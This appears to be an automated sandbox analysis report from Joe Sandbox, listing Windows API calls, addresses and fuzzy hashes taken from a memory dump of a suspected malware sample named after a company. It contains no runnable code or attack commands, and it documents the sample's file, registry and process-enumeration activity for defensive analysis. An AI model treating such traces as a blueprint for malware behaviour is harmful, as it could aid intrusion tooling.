                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3150196962-0
                                                                                                    • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                    • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$PointerRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 3154509469-0
                                                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                    APIs
                                                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4232544981-0
                                                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                    APIs
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FileModuleName
                                                                                                    • String ID:
                                                                                                    • API String ID: 3859505661-0
                                                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                    • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                    • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                    • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                    • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                    • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                    APIs
                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                    • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                    • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                    • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                    • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                    • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                    • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                    • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                    • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                    • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                    • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                    • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                    • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                    APIs
                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumNamesResource
                                                                                                    • String ID:
                                                                                                    • API String ID: 3334572018-0
                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 3664257935-0
                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseFind
                                                                                                    • String ID:
                                                                                                    • API String ID: 1863332320-0
                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                    • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                                                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3655998216-0
                                                                                                    • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                    • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
